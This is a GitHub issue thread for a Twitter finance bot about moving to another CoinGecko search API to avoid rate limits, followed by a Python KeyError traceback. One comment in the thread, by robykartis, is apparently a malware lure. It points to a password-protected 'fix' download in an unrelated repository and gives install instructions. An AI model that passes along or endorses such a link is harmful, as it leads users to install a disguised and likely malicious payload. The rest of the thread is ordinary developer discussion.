### ISSUE TITLE
Use other coingecko api to search for coins

### ISSUE THREAD

**Issue by StephanAkkerman** [StephanAkkerman/fintwit-bot#644]
Use this instead:
Hopefully that prevents rate limits
https://www.coingecko.com/en/search_v2?query=btc&vs_currency=usd

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by StephanAkkerman** [comment]
Use the query:
- Check if any matches name, id, symbol (probably the top result will be the best)
- Get the data

**Comment by StephanAkkerman** [comment]
Traceback (most recent call last):
  File "/home/akkie100/fintwit-bot/src/util/disc.py", line 17, in wrapper
    return await func(*args, **kwargs)
  File "/home/akkie100/fintwit-bot/src/cogs/loops/timeline.py", line 160, in get_latest_tweet
    await asyncio.gather(*tasks)
  File "/home/akkie100/fintwit-bot/src/cogs/loops/timeline.py", line 188, in on_data
    e, category, base_symbols = await make_tweet_embed(
  File "/home/akkie100/fintwit-bot/src/util/tweet_embed.py", line 111, in make_tweet_embed
    e, category, base_symbols = await add_financials(
  File "/home/akkie100/fintwit-bot/src/util/tweet_embed.py", line 234, in add_financials
    ticker_info = await classify_ticker(symbol, majority)
  File "/home/akkie100/fintwit-bot/src/util/ticker_classifier.py", line 169, in classify_ticker
    crypto_data = await get_best_guess(ticker, "crypto")
  File "/home/akkie100/fintwit-bot/src/util/ticker_classifier.py", line 101, in get_best_guess
    volume, website, exchange, price, change, base_sym = await fetch_asset_info(
  File "/home/akkie100/fintwit-bot/src/util/ticker_classifier.py", line 60, in fetch_asset_info
    return await get_coin_info(ticker)
  File "/home/akkie100/fintwit-bot/src/api/coingecko.py", line 191, in get_coin_info
    change = coin["data"]["price_change_percentage_24h"]["usd"]
KeyError: 'usd'
